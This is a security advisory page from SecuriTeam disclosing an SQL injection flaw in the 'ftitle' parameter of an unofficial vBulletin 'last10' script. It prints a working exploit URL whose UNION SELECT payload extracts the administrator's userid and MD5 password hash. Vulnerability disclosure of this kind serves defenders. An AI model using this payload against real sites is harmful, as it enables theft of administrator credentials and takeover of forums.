SecuriTeam - vBulletin Unofficial lastten SQL Injection (ftitle)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam
Beyond Security

SecuriTeam Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

vBulletin's unofficial Last XX (lastten, last10) PHP script has been found to contain an SQL injection vulnerability in its ftitle parameter, allowing a remote attacker to cause the program to execute arbitrary SQL statements.

Credit:
The information has been provided by al3ndaleeb.

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Exploit:
The following URL will cause the server to return the userid and MD5 password of the administrator of the vBulletin forum:
http://site/forum/last10.php?ftitle=%20WHERE%20userid=0%20UNION%20SELECT%20null, userid, password, null, null, null, null, null, null%20FROM%20user%20WHERE%20usergroupid=6%20LIMIT%201/*

	PHP dba_replace() Arbitrary File Destruction
	VLC Media Player RealText Processing Stack Overflow Vulnerability
	LibSPF2 DNS TXT Record Parsing Bug
	GNU Enscript "setfilename" Special Escape Buffer Overflow
	File-Find-Object Format String Vulnerability
	Veritas Storage Foundation Arbitrary File Read Vulnerability
	Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability
	Apache Tomcat Information Disclosure (RemoteFilterValve)
	Apple CUPS HP-GL/2 filter Code Execution Vulnerability
	WordPress MU wpmu-Blogs.php Crose Site Scrpting Vulnerability
	strongSwan IKEv2 Denial of Service Vulnerability
	Cross-Site Scripting Filter Evasion in Various Frameworks / Applications
	MySQL Charset Truncation Vulnerability
	Wordpress user_login Column SQL Truncation Vulnerability
	Joomla Weak Random Password Reset Token Vulnerability